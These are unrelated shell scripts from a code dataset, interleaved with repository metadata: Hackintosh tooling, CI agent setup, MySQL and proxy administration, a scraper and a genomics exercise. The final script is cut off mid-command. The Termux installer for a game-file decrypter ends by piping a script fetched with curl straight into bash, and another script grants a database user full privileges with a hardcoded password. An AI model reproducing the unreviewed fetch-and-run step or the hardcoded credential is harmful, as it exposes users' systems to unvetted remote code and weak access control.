string=$(which python)
word='envs'
if test "${string#*$word}" != "$string"; then
python -m pip $@
# Invoke pip directly through python
# See https://jakevdp.github.io/blog/2017/12/05/installing-python-packages-from-jupyter/
else
echo 'Python is not installed in this environment; not running'
fi
else
echo 'No active environment; not running'
fi
}
# zsh precmd() function: special function that's executed before each command
# precmd() {
# conda_auto_env
# }
# }
# }
# zshrc.local {
# Put system-specific stuff in `~/.zshrc.local`.
[ -f "$HOME/.zshrc.local" ] && source "$HOME/.zshrc.local"
# }
| true
|
c98f970c863b07963c4d8621f8767fbc29af7811
|
Shell
|
bridgecrew-perf7/deploy_nginx_without_mysql
|
/add_base.sh
|
UTF-8
| 284
| 2.828125
| 3
|
[] |
no_license
|
# create random password
USER_NAME=faser
PASSWDDB=faser
# replace "-" with "_" for database username
MAINDB=${USER_NAME//[^a-zA-Z0-9]/_}
mysql -uroot -e "CREATE DATABASE $MAINDB"
mysql -uroot -e "GRANT ALL PRIVILEGES ON $MAINDB.* TO $MAINDB@localhost IDENTIFIED BY '$PASSWDDB'"
| true
|
e76521e8c30745ab358266717a3e79bb8415af6a
|
Shell
|
IAMX-YT/OBBDECODER
|
/Setup.sh
|
UTF-8
| 1,710
| 3.03125
| 3
|
[] |
no_license
|
#!/data/data/com.termux/files/usr/bin/bash env
############################################
# [IAMX] PUBG OBB DECRYPTER
############################################
echo "welcome To Our New OBB file Decrypter By IAMX"
sleep 1
echo ""
echo "Connecting..."
sleep 4
#Get The permission of Termux
echo "Type y"
termux-setup-storage
#REFRESH TERMUX
apt update && apt upgrade
gem install lolcat
#Checking Required Pakcages
echo -e "Installing... Required packages"
apt install wget -y
apt install toilet -y
pkg install wget
pkg install mpv -y
pkg install toilet
pkg install pv
pkg install curl
pkg install x11-repo
pkg install qemu-system-i386
pkg install qemu-user-i386
# Remove existing files
if
[ -e /data/data/com.termux/files/home/XDECODER ]
then
rm -rf /data/data/com.termux/files/home/XDECODER
fi
mkdir /data/data/com.termux/files/home/XDECODER
#DOWNLOAD TOOLS
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/XDECODER -O /data/data/com.termux/files/home/XDECODER/quickbms
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/IAMX -O /data/data/com.termux/files/home/XDECODER/IAMX.bms
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/License -O /data/data/com.termux/files/home/XDECODER/License
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/UpdateVersion -O /data/data/com.termux/files/home/XDECODER/UpdateVersion
toilet -f term -F gay "Complete"
sleep 2
toilet -f term -F gay "NEXT TIME USE THIS COMMAND"
sleep 1
toilet -f term -F gay "sh DECODE.sh and press Enter"
sleep 1
toilet -f term -F gay "Script Starting...."
#START OBB DECODER SCRIPT
bash <(curl -s https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/DECODE.sh)
| true
|
958d609fefb5843bb2bb948e7238b8f8836264db
|
Shell
|
andikamc/opensvh
|
/source/script/expire-trojan
|
UTF-8
| 456
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
clear
trojanData=( `cat /etc/trojan/config.json | grep '^###' | cut -d ' ' -f 2`);
now=`date +"%Y-%m-%d"`
for user in "${trojanData[@]}"
do
exp=$(grep -w "^### $user" "/etc/trojan/config.json" | cut -d ' ' -f 3)
d1=$(date -d "$exp" +%s)
d2=$(date -d "$now" +%s)
exp2=$(( (d1 - d2) / 86400 ))
if [[ "$exp2" = "0" ]]; then
sed -i "/^### $user $exp/,/^},{/d" /etc/trojan/config.json
fi
done
systemctl restart trojan
| true
|
14d5229f2d58167aab12520abd9a58fa88d08648
|
Shell
|
clearpathrobotics/pr2-kinect2-packages
|
/debian/preinst
|
UTF-8
| 577
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
echo "This will install the pr2-kinect2-packages package on your computer."
echo "This package is only intended for use with an Intel NUC which will be connected to a Kinect 2."
echo "If run on a computer other than a NUC, it may irrevocably damage your OS installation."
read -r -p "If you understand and want to continue, please type this phrase exactly as it appears: 'Yes, I understand. Continue!' " input
if [[ $input == "Yes, I understand. Continue!" ]];
then
echo "Continuing with installation!"
exit 0
else
echo "Aborting installation!"
exit 1
fi
| true
|
a152e4d7ed5a975f4b080e7b37f27f467e640678
|
Shell
|
PettTo/Feature-Model-History-of-Linux
|
/KConfig_Analysis/analysis.sh
|
UTF-8
| 1,478
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
#### initiate variables
analysisRoot="../../Evaluation/KConfig_Analysis/"
interFile="../../Evaluation/KConfig_Analysis/interFile.txt"
shaFile="../../Evaluation/KConfig_Analysis/shas.txt"
kconfigReaderRun="../Tools/kconfigreader/run.sh"
dumpConf="../Tools/kconfigreader/binary_4.15/dumpconf"
archKConfig="arch/x86/Kconfig"
sha415="d8a5b80568a9cb66810e75b182018e9edb68e8ff"
#### get the commit sha's from relevant commits
echo "######## reade commits from git log ########"
git reset --hard
git clean -fxd
git checkout $sha415
git log arch/x86/Kconfig > $interFile
echo "######## create sha file ########"
> $shaFile
while IFS='' read -r line || [[ -n "$line" ]]; do
if [[ $line == commit* ]]
then
split=$(echo $line | tr " " "\n")
for str in $split
do
if ! [[ $str == commit* ]]
then
echo $str >> $shaFile
fi
done
fi
done < "$interFile"
echo "######## sha creation finished ########"
##### analyse all relevant revisions
echo "######## start analysis ########"
while IFS='' read -r sha || [[ -n "$sha" ]]; do
echo "### Analyse revsion: $sha ###"
git reset --hard
git clean -fxd
git checkout $sha
mkdir -p $analysisRoot/$sha
$kconfigReaderRun de.fosd.typechef.kconfig.KConfigReader --dumpconf $dumpConf --writeDimacs $archKConfig $analysisRoot/$sha/out
done < "$shaFile"
echo "######## analysis finished ########"
# clean up
echo "######## clean up the git ########"
git reset --hard
git clean -fxd
git checkout $sha415
| true
|
741a4f544e39ea13463f895de8c85ad0e7332246
|
Shell
|
malanchak/AuTuMN
|
/scripts/buildkite/setup.sh
|
UTF-8
| 1,745
| 2.53125
| 3
|
[
"BSD-2-Clause-Views"
] |
permissive
|
# See https://buildkite.com/organizations/autumn/agents#setup-ubuntu
# Run as root
# TODO: Put all SSH keys in /var/lib/buildkite-agent/.ssh/
# TODO: Add AWS creds to /etc/buildkite-agent/hooks/environment
# TODO: Install yarn and node v12
AGENT_TOKEN=xxx
sh -c 'echo deb https://apt.buildkite.com/buildkite-agent stable main > /etc/apt/sources.list.d/buildkite-agent.list'
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 32A37959C2FA5C3C99EFBC32A79206696452D198
apt-get update
apt-get install -y buildkite-agent
sed -i "s/xxx/$AGENT_TOKEN/g" /etc/buildkite-agent/buildkite-agent.cfg
systemctl enable buildkite-agent
systemctl start buildkite-agent
# journalctl -f -u buildkite-agent
# Upgrade to 2 agents
systemctl stop buildkite-agent
systemctl disable buildkite-agent
# Create a systemd template
cp /lib/systemd/system/buildkite-agent.service /etc/systemd/system/buildkite-agent@.service
# Start 9 agents using the systemd template we created above
systemctl enable --now buildkite-agent@1
systemctl enable --now buildkite-agent@2
systemctl enable --now buildkite-agent@3
systemctl enable --now buildkite-agent@4
systemctl enable --now buildkite-agent@5
systemctl enable --now buildkite-agent@6
systemctl enable --now buildkite-agent@7
systemctl enable --now buildkite-agent@8
systemctl enable --now buildkite-agent@9
apt-get install -qq python3-pip virtualenv
# If you need to disable agents
systemctl disable buildkite-agent@1
systemctl disable buildkite-agent@2
systemctl disable buildkite-agent@3
systemctl disable buildkite-agent@4
systemctl disable buildkite-agent@5
systemctl disable buildkite-agent@6
systemctl disable buildkite-agent@7
systemctl disable buildkite-agent@8
systemctl disable buildkite-agent@9
| true
|
7cc0992b4ac9fc0f94d4105644f9e9041c65ffff
|
Shell
|
rokibhasansagar/builder_demo
|
/ccashier.sh
|
UTF-8
| 837
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
ccache_task="${1}" # upload/download
CCache_URL="https://gdrive.phantomzone.workers.dev/0:/mido_ccache/ccache.tgz"
mkdir -p /home/runner/.cache/ccache /home/runner/.config/rclone
cd /home/runner/.cache/
if [[ ${ccache_task} =~ upload ]]; then
printf "Compressing ccache data...\n"
tar -I "pigz -k -3" -cf ccache.tgz ccache
du -sh ccache.tgz
printf "Setting up rclone and uploading...\n"
echo "${RClone_Config}" > /home/runner/.config/rclone/rclone.conf
rclone delete td:/mido_ccache/ccache.tgz 2>/dev/null || true
rclone copy ccache.tgz td:/mido_ccache/ --progress
rm -rf ccache.tgz
elif [[ ${ccache_task} =~ download ]]; then
printf "Downloading previous ccache...\n"
aria2c -c -x8 -s16 "${CCache_URL}"
printf "Expanding ccache files...\n"
tar -I "pigz" -xf ccache.tgz
rm -rf ccache.tgz
fi
| true
|
1e03953a743c43053b6fea2046b91b6aa1f3abf4
|
Shell
|
andrius/xiringuito
|
/scripts/client-preexec.sh
|
UTF-8
| 270
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Execute *before* doing anything
#
if [[ "$(sha1sum discover-routes | cut -f1 -d' ')" == "246d9bbeded14ef58e5bc103af0f8c2e8b2e8cf2" ]]; then
echo "!!! Rewriting stale 'discover-routes' script"
cp discover-routes.aws.example discover-routes
fi
| true
|
32cfadcd1e9d3c64e547fc0b4fac344d6aa25acf
|
Shell
|
rhardin/chess_scripts
|
/twic/createBigPgnFile.sh
|
UTF-8
| 352
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "archive files..."
for file in `echo *.zip`; do
cp ${file} archive/${file}
done
echo "unzipping files..."
for file in `echo *.zip*`; do
unzip ${file}
rm ${file}
done
echo "writing big.png..."
cat *.pgn > big.pgn
rm twic*.pgn
for x in `echo twic*`; do
cat $x/games/*.pgn >> big.pgn
rm -rf $x
done
echo "done"
| true
|
d0015e192069896bd281e04ab3fc5b64d74674a5
|
Shell
|
tectronics/archlive.mkarchlive
|
/profiles/chakra/overlay/usr/share/tribe/scripts/job-initialize-target
|
UTF-8
| 2,099
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
job_initialize_target()
{
# initialize error handling
trap error_handler ERR
msg_job_start "job_initialize_target"
# recreate some needed dirs
msg "regenerating special directories"
rm -v -rf ${mountpoint}/sys ${mountpoint}/proc ${mountpoint}/dev
mkdir -p -v -m 1777 ${mountpoint}/tmp
mkdir -p -v -m 1777 ${mountpoint}/var/tmp
mkdir -p -v ${mountpoint}/var/log/old
mkdir -p -v ${mountpoint}/var/lock/sane
mkdir -p -v ${mountpoint}/boot/grub
mkdir -p -v ${mountpoint}/usr/lib/locale
mkdir -p -v ${mountpoint}/usr/share/icons/default
mkdir -p -v ${mountpoint}/media
mkdir -p -v ${mountpoint}/mnt
mkdir -v ${mountpoint}/sys
mkdir -v ${mountpoint}/proc
# create basic devices on the target
msg "creating basic devices"
mkdir -v ${mountpoint}/dev
mknod ${mountpoint}/dev/console c 5 1
mknod ${mountpoint}/dev/null c 1 3
mknod ${mountpoint}/dev/zero c 1 5
# ensure correct permission on /tmp and /var/tmp
msg "setting permissions on /tmp and /var/tmp"
chmod -v 777 ${mountpoint}/var/tmp
chmod -v o+t ${mountpoint}/var/tmp
chmod -v 777 ${mountpoint}/tmp
chmod -v o+t ${mountpoint}/tmp
# install resolv.conf
msg "copying /etc/resolv.conf"
cp -vf /etc/resolv.conf ${mountpoint}/etc/resolv.conf
# add basic configs for root
msg "installing configs for root"
cp -vf /etc/skel/.bashrc ${mountpoint}/root/.bashrc
cp -vf /etc/skel/.bash_profile ${mountpoint}/root/.bash_profile
cp -vf /etc/skel/.xinitrc ${mountpoint}/root/.xinitrc
cp -vf /etc/skel/.xsession ${mountpoint}/root/.xsession
cp -vf /etc/skel/local.conf ${mountpoint}/etc/fonts/local.conf
# Set mouse theme for root
msg "Setting mouse theme for root"
cp -vf /usr/share/icons/default/index.theme ${mountpoint}/usr/share/icons/default/index.theme
# Proper kdmrc
sed -i -e 's~^.*Theme=/.*~Theme=/usr/share/apps/kdm/themes/ashoc~' ${mountpoint}/usr/share/config/kdm/kdmrc
sed -i -e 's~^.*#AntiAliasing=.*~AntiAliasing=true~' ${mountpoint}/usr/share/config/kdm/kdmrc
sed -i -e 's~^.*#TerminateServer=.*~TerminateServer=true~' ${mountpoint}/usr/share/config/kdm/kdmrc
msg_job_done
}
| true
|
70536260d1a765cbc53208df7c792ec1bc799b35
|
Shell
|
partovengine/evaluation
|
/scripts/evaluate-hping-ES3.2.sh
|
UTF-8
| 1,175
| 3.375
| 3
|
[] |
no_license
|
# Driver for the hping3 evaluation subscenario: for each round, launch
# increasing numbers of concurrent hping3 flows and record each batch's
# aggregate CPU usage and summed peak memory.
#
# $1 - round number to resume from (rounds $1..N are executed).
startinground=$1
N=4
. functions.sh
# Flow counts swept per round: 1, 1+STEP, ... up to MAX_FLOWS.
MAX_FLOWS=154
STEP=9
cd ../outputs/
# Generate a small helper that runs a single 60-packet ICMP flow
# (1 s interval, 1024-byte payload) against 4.2.2.4 and logs its raw
# output; `|| true` keeps one failing flow from aborting the batch.
echo 'n=$1; i=$2; round=$3;' > run-hping.temp
echo 'hping3 -c 60 -i 1 -d 1024 -1 4.2.2.4 > hping3-multi-$n-flow-$i-raw-round-${round}.txt 2>&1 || true;' >> run-hping.temp
chmod +x run-hping.temp
# Run $1 concurrent flows for round $2: generate a batch script of
# backgrounded, /usr/bin/time-wrapped helper invocations, execute it,
# then log "<overall CPU> <summed peak memory>" for the batch.
function hping_multi_instances {
local n=$1
local round=$2
local i;
# One backgrounded line per flow; %M reports each flow's peak
# resident set size into its own mem-<i>.temp file.
for((i=0;$i<$n;i=$i+1)); do
echo "/usr/bin/time --format=\"%M\" ./run-hping.temp $n $i $round 2>mem-${i}.temp &"
done > hping3-multi-${n}-round-${round}.sh
# Barrier: the batch script returns only when every flow is done.
echo "wait" >> hping3-multi-${n}-round-${round}.sh
chmod +x hping3-multi-${n}-round-${round}.sh
# %P = CPU percentage of the batch as a whole.
/usr/bin/time --format="%P" ./hping3-multi-${n}-round-${round}.sh 2>cpu-overall.temp
# Sum the per-flow peak-memory samples into one total.
local totalmaxmem=0
for((i=0;$i<$n;i=$i+1)); do
local memval=$(cat mem-${i}.temp);
let totalmaxmem="$totalmaxmem+$memval";
done
echo "$(cat cpu-overall.temp) $totalmaxmem" > hping3-multi-$n-cpu-memory-round-${round}.log
}
for((round=$startinground;$round<=$N;round=$round+1)); do
echo "Running hping3...Round #${round}.............................."
for((i=1;$i<=$MAX_FLOWS;i=$i+$STEP)); do
hping_multi_instances $i $round
echo "The ${i} hping3 subscenario is finished."
done
done
| true
|
bd7126e95c8f6afefc828c497dfeb3a8d8b6da96
|
Shell
|
TelephoneTan/HP-Pavilion-bc015tx-Hackintosh
|
/Obsoleted/ALC295PlugFix/alc_fix/uninstall.command
|
UTF-8
| 1,223
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e

# Remove the ALCPlugFix audio fix and its launch daemon.
# Requires root privileges and System Integrity Protection disabled.
echo "Uninstalling ALCPlugFix. Root user is required."

# SIP must be off (and its status known) before touching the protected
# paths below; csrutil's output is matched as a substring.
sip_status=$(csrutil status)
case "$sip_status" in
  *enable*)
    echo "SIP is enabled, please consider disable it by setting"
    echo "csr-active-config to 7F000000 (DATA) and then reboot"
    echo "or running csrutil disable in terminal under recovery mode."
    exit 1
    ;;
  *unknown*)
    echo "SIP status is unknown, please consider disable it by setting"
    echo "csr-active-config to 7F000000 (DATA) and then reboot"
    echo "or running csrutil disable in terminal under recovery mode."
    exit 1
    ;;
esac

# Since macOS 10.15 the root filesystem is read-only by default;
# remount it read-write when necessary.
if sudo test ! -w "/"; then
    echo "Root filesystem is not writeable. Remounting as read-write and restarting Finder."
    sudo mount -uw /
    sudo killall Finder
fi

echo "Removing files..."
sudo rm -v /usr/bin/ALCPlugFix
sudo rm -v /usr/bin/alc-verb
sudo launchctl unload -w /Library/LaunchDaemons/good.win.ALCPlugFix.plist
sudo launchctl remove good.win.ALCPlugFix
sudo rm -v /Library/LaunchDaemons/good.win.ALCPlugFix.plist
echo "Done!"
exit 0
| true
|
49d50b5e9b1227c61acd5f75e99f9da7b82b92af
|
Shell
|
arai-a/binjs-fbssdc
|
/test.sh
|
UTF-8
| 582
| 3.375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e

# Integration test for round-tripping a file.
prog_dir=$(dirname "$(realpath "$0")")
tmp_dir=$(mktemp -d)

# Fix: remove the scratch directory on every exit path. Previously it
# was only removed on the success path, so a failing bpy.py step (under
# `set -e`) or the `exit 1` on mismatch leaked a temp directory.
cleanup() { rm -rf "$tmp_dir"; }
trap cleanup EXIT

pushd "$tmp_dir" > /dev/null

"$prog_dir"/bpy.py make-dict "$prog_dir"/test-data/y5R7cnYctJv.js.dump my.dict
"$prog_dir"/bpy.py optimize-ast "$prog_dir"/test-data/three.min.js.dump three.dump
"$prog_dir"/bpy.py encode-ast my.dict three.dump three.bin
"$prog_dir"/bpy.py decode-ast my.dict three.bin three.out

# `diff -q` exits non-zero when the files differ; test the exit status
# instead of capturing the (possibly large) textual diff.
if ! diff -q three.dump three.out > /dev/null; then
    echo 'test fails, decoded files differ'
    exit 1
else
    echo 'test passed'
fi

popd > /dev/null
| true
|
3b392e7962a00626fb71ff9724333617a42d353e
|
Shell
|
newhavengill/EnvironmentManager
|
/db/oracle/common/bin/dbargsSansDatabase
|
UTF-8
| 733
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/sh
# Print an Oracle-style connect string
# (user/password@//host:port/domain) for a database/environment pair,
# with every field looked up via ueConfigValueForKey.
NAME=`basename "$0"`
# NOTE(review): the brackets suggest [database] is optional, but the
# argument check below requires exactly 3 arguments — confirm intent.
USAGE="usage: $NAME -e <env name> [database]"
ENV_NAME="$2"
DB_NAME="$3"
##########################################################
# Parse Args
if [ $# -ne 3 ] ; then
echo "$USAGE"
exit 1
fi
if [ "$1" != "-e" ] ; then
echo "$USAGE"
exit 1
fi
##########################################################
#
# Each config key is looked up under "<database>.<environment>".
# `ueConfigValueForKey` is not defined here — presumably provided by
# the surrounding EnvironmentManager tooling; confirm it is on PATH.
host=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.host"`
username=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.username"`
password=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.password"`
port=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.port"`
domain=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.domain"`
echo "$username/$password@//$host:$port/$domain"
| true
|
560d27d5b5c276cb65a9f35a6e7b0aa8d00dd708
|
Shell
|
manishbansal8843/cloud-k8s-cluster
|
/install.sh
|
UTF-8
| 681
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e

# Bootstrap a Kubernetes cluster by delegating to a provider-specific
# entrypoint script; configured entirely via environment variables.
echo "=====================================Welcome to cloud k8s cluster installer====================================="
echo "Usage: NUM_OF_NODES=3 CLOUD_PROVIDER=gcp GCP_PROJECT_NAME=project-name-value ./install.sh"

# Defaults when the caller did not export them.
: "${NUM_OF_NODES:=3}"
: "${CLOUD_PROVIDER:=gcp}"

# Computed for the sourced provider entrypoint (not read locally) —
# presumably one control-plane node plus WORKER_NODES workers.
WORKER_NODES=$((NUM_OF_NODES - 1))

# Guard clauses replace the original if/elif chain; same checks, same
# messages, same exit codes.
if (( NUM_OF_NODES < 1 )); then
    echo "NUM_OF_NODES cannot be less than 1"
    exit 1
fi

if [[ ! -f "$CLOUD_PROVIDER/entrypoint.sh" ]]; then
    echo "$CLOUD_PROVIDER cloud provider is not supported as of now. Kindly check documentation for supported cloud providers."
    exit 2
fi

echo "Going to install k8s cluster on $CLOUD_PROVIDER"
. "$CLOUD_PROVIDER/entrypoint.sh"
| true
|
b9a5866e950ecb944a73c521c5d2b384a4d38e38
|
Shell
|
kanoop640/ShellProgram
|
/Basic/userInputMulti.sh
|
UTF-8
| 327
| 3.109375
| 3
|
[] |
no_license
|
# Demo of the various forms of the `read` builtin for user input.

# Plain read into a named variable.
echo Enter name :
read name
echo Entered name is : $name

# -p prints an inline prompt before reading.
read -p "username :" user_var
echo "username is :" $user_var

# -s (silent) suppresses echo of the typed characters — for passwords.
read -sp "Password :" pass_var
echo
echo Password is : $pass_var

# -a splits the input on whitespace into an indexed array.
echo "Enter multiple name"
read -a names
echo "Names is :"${names[0]}, ${names[1]}

# With no variable name, read stores the line in $REPLY.
echo Enter Company name :
read
echo Company is : $REPLY
| true
|
bbbf45266c12541f7d503c89bf56709e71d723f2
|
Shell
|
ryanwoodsmall/shell-ish
|
/bin/roku-hdhomerun-ply.sh
|
UTF-8
| 419
| 3
| 3
|
[] |
no_license
|
#!/bin/bash

# Launch the "ply" streaming helper on $PLYPORT with python2.7,
# teeing its combined output to $PLYLOG.
export PATH="/opt/python/python-2.7/bin:${PATH}"
export PATH="${PATH}:/usr/local/sbin:/usr/local/bin"
export PLYPORT="6969"
export PLYDIR="${HOME}/downloads/github/themacks/ply"
export PLYLOG="/tmp/ply.log"

test -e "${PLYDIR}" || {
    echo "no such dir ${PLYDIR}"
    exit 1
}
pushd "${PLYDIR}"
test -e ply.py || {
    echo "no such file ${PWD}/ply.py"
    exit 1
}
# Fix: the log was written to ${PLYLOG}x (stray trailing "x"), i.e.
# /tmp/ply.logx instead of the configured /tmp/ply.log. Expansions are
# now also quoted.
python2.7 ply.py "${PLYPORT}" 2>&1 | tee "${PLYLOG}"
| true
|
897a8a427bbed88aae9068a88948895e3f6f2651
|
Shell
|
Amergoli/qa_chatbots_exercises
|
/exercise_4/docker_example/boot.sh
|
UTF-8
| 159
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash

# Container entrypoint: start the uvicorn app named by $NAME.
# Fix: the original `[ -n $SERVER_PORT ]` expanded to the one-argument
# test `[ -n ]` when SERVER_PORT was unset/empty, which is always true,
# so the guard never guarded anything. Quoting restores the intended
# "only start when SERVER_PORT is set" check.
if [ -n "$SERVER_PORT" ]
then
    echo Starting container $NAME on port $SERVER_PORT
    # NOTE(review): the message reports $SERVER_PORT but uvicorn is
    # bound to port 80 — presumably the container maps 80 to
    # $SERVER_PORT externally; confirm before changing.
    exec uvicorn "$NAME:app" --reload --host 0.0.0.0 --port=80
fi
| true
|
b41fd07a209141da3183bfdd28c4da50528f8553
|
Shell
|
EngineerBetter/developer-training-class-apps
|
/ci/unpause-pipelines.sh
|
UTF-8
| 373
| 2.609375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e

# Unpause the project's Concourse pipelines on the given fly target.
# Usage: unpause-pipelines.sh <target>
if [ "$1" = "" ]; then
  echo "$0: usage: $0 target"
  # Fix: exit non-zero on a usage error; the original's bare `exit`
  # reported success even though nothing was done.
  exit 1
fi

target=$1
# (Removed an unused `this_directory` variable from the original.)

fly -t "$target" unpause-pipeline -p rate-limit-route-service
fly -t "$target" unpause-pipeline -p rest-data-service
fly -t "$target" unpause-pipeline -p web-ui
fly -t "$target" unpause-pipeline -p uaa
fly -t "$target" unpause-pipeline -p uaa-guard-proxy
| true
|
3a7074ebeb0c387d8f54566e183e8f062da8a961
|
Shell
|
rh9/wget
|
/script/wget/xakep_ru_s.sh
|
UTF-8
| 1,943
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
source /usr/script/wget/config.cfg
cd /var/www/html/xakep.ru
mkdir `date +%Y.%m.%d`
cd `date +%Y.%m.%d`
wget -HEkp -nc -nd -l 0 -e robots=off xakep.ru
sleep 1
mkdir i
mkdir post
#ัะบะฐัะธะฒะฐะฝะธะต ัััะปะพะบ
# for loop in `cat ../index.html | sed -e 's/\/i\//\ni\//g' | grep Images | awk -F \' '{ print $1 }'`
# do
# echo 'wget -HEkp -nd -l 0 -e robots=off "mobiledevice.ru/$loop"'
# done
#ะบะพะผะตะฝัะธััะตะผ ัะบัะธะฟัั
cat index.html | sed -e '
s/<script/<!--script/g;
s/<\/script>/<\/script-->/g' > index2.html
# cat index2.html | sed -e '
# s/<a/<!--a/g;
# s/<\/a>/<\/a-->/g' > index1.html
#http://nizhniynovgorod.irr.ru/advert/45898683/
#ะฟะตัะตะฝะพั ัััะปะพะบ ะฝะฐ ะฝะพะฒัะต ัััะพะบะธ
cat index2.html | sed -e 's/http:/\nhttp:/g' | grep xakep.ru/post | awk -F \" '{ print $1 }' | egrep -v asp | egrep -v jpg | sort -u > links.txt
cd post
#ัะบะฐัะธะฒะฐะฝะธะต ัััะปะพะบ
for loop in `cat ../index2.html | sed -e 's/http:/\nhttp:/g' | grep xakep.ru/post | awk -F \" '{ print $1 }' | egrep -v asp | egrep -v jpg | sort -u | awk -F \/ '{ print $5 }'`
do
mkdir $loop
cd $loop
wget -HEkp -nd -l 0 -e robots=off "xakep.ru/post/$loop"
cd ../
done
cd ../
#ะธะทะผะตะฝะตะฝะธะต ัััะปะพะบ ะฝะฐ ะปะพะบะฐะปัะฝัะต
cat index2.html | sed -e 's/http:\/\/www.xakep.ru\///g' > index.html
mkdir i/img_new
#cd i/img_new
#wget -HEkp -nc -nd -l 0 -e robots=off http://www.xakep.ru/i/img_new
#cd ../../../
tar -cjf `date +%Y.%m.%d`.tar.bz2 `date +%Y.%m.%d`/*
if [ ! -e /var/ftp/download/usb_disk/xakep.ru ]
then
mkdir /var/ftp/download/usb_disk/xakep.ru
fi
mv `date +%Y.%m.%d`.tar.bz2 /var/ftp/download/usb_disk/xakep.ru/
find /var/www/xakep.ru -name '*' -mtime +7 -exec rm -f {} ;
find /var/ftp/download/usb_disk/xakep.ru -name '*.tar.bz2' -mtime +14 -exec rm -f {} ;
| true
|
51ccd4fbbb5ec003aca0c7cc12a7acefd9bcac7b
|
Shell
|
rafaelflorindo/shellScript
|
/operadorAtribuicaoSimples.sh
|
UTF-8
| 557
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# script: operadorAtribuicaoSimples.sh
# Demonstrates direct variable assignment and assignment performed
# inside an arithmetic expression.

x=8
y=18
z=38

printf '%s\n' "** Valores Iniciais. **"
printf '%s\n' "X = $x"
printf '%s\n' "Y = $y"
printf '%s\n' "Z = $z"

# Copy y into x.
x=$y

printf '%s\n' "** Valores Alterados. **"
printf '%s\n' "Valores de X Alterado = $x"

# Assign z to y arithmetically, then propagate the result to x
# (equivalent to the original x=$((y=z))).
(( y = z ))
x=$y

printf '%s\n' "Valores de X Alterado = $x"
printf '%s\n' "Valores de Y Alterado = $y"
printf '%s\n' "Valores de z Alterado = $z"

# Expected output:
#   ** Valores Iniciais. **
#   X = 8 / Y = 18 / Z = 38
#   ** Valores Alterados. **
#   X becomes 18, then 38; Y and Z end at 38.
| true
|
b15ca45151bd8808f0916d2db9929a6008ca5e1d
|
Shell
|
mandylr/problem-set-2
|
/run.sh
|
UTF-8
| 3,406
| 3.609375
| 4
|
[] |
no_license
|
#! bin/usr/env bash
## Question 1
#Use BEDtools intersect to identify the size of the largest overlap between
#CTCF and H3K4me3 locations.
datasets='/Users/mandyricher/Desktop/Classes/GenomicsWorkshop/data-sets'
H3K4="$datasets/bed/encode.h3k4me3.hela.chr22.bed.gz"
TFBS="$datasets/bed/encode.tfbs.chr22.bed.gz"
gzcat $TFBS | awk '$4 == "CTCF"' \
| bedtools sort -i - > data/CTCF.bed
answer1=$(gzcat $H3K4 \
| bedtools sort -i - \
| bedtools intersect -a data/CTCF.bed -b - -wo \
| awk '{print $NF}' \
| sort -nr \
| head -n1)
echo "answer-1: $answer1"
## Question 2
#Use BEDtools to calculate the GC content of nucleotides 19,000,000 to
#19,000,500 on chr22 of `hg19` genome build. Report the GC content
#as a fraction (e.g., 0.50).
#Use bedtools nuc -fi <fasta> -bed <bed> contains ranges to extract
#You want column 2 - %GC content, but may need to change it to a fraction
HG19="$datasets/fasta/hg19.chr22.fa"
GC="/Users/mandyricher/Desktop/Classes/GenomicsWorkshop/problem-set-2/data/GC.bed"
echo -e "chr22\t19000000\t19000500" > $GC
answer2=$(bedtools nuc -fi $HG19 -bed $GC \
| cut -f5 \
| tail -n1)
echo "answer-2: $answer2"
## Question 3
#Use BEDtools to identify the length of the CTCF ChIP-seq peak (i.e.,
#interval) that has the largest mean signal in `ctcf.hela.chr22.bg.gz`.
#map, mean
#gunzip $datasets/bedtools/ctcf.hela.chr22.bg
CTCF="$datasets/bedtools/ctcf.hela.chr22.bg"
answer3=$(bedtools map -a data/CTCF.bed -b $CTCF -c 4 -o mean \
| sort -k5n \
| tail -n1 \
| awk '{print $3 - $2}')
echo "answer-3: $answer3"
## Question 4
#Use BEDtools to identify the gene promoter (defined as 1000 bp upstream of
#a TSS) with the highest median signal in `ctcf.hela.chr22.bg.gz`. Report
#the gene name (e.g., 'ABC123')
#promotors == 1000 bp upstream
#bedtools flank -l(left) -s(strand)
#map median
TSS="$datasets/bed/tss.hg19.chr22.bed.gz"
GENOME="$datasets/genome/hg19.genome"
answer4=$(gzcat $TSS \
| bedtools flank -s -i - -g $GENOME -l 1000 -r 0 \
| bedtools sort -i - \
| bedtools map -a - -b $CTCF -c 4 -o median \
| sort -k7n \
| tail -n1\
| cut -f4)
echo "answer-4: $answer4"
## Question 5
#Use BEDtools to identify the longest interval on `chr22` that is not
#covered by `genes.hg19.bed.gz`. Report the interval like `chr1:100-500`.
#complement, given input intervals, it will give you back all the
#intervals not covered by the input
#Must also give it a genome file
GENES="$datasets/bed/genes.hg19.bed.gz"
awk '$1 == "chr22"' $GENOME > data/chr22.genome
answer5=$(gzcat $GENES \
| awk '$1 == "chr22"' \
| bedtools sort -i - \
| bedtools complement -i - -g data/chr22.genome \
